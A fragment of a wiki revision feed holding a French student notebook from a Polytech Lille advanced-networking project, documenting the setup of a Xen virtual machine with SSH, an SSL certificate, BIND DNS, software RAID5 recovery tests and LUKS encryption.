       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46211</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46211"/>
				<updated>2017-11-13T12:42:27Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
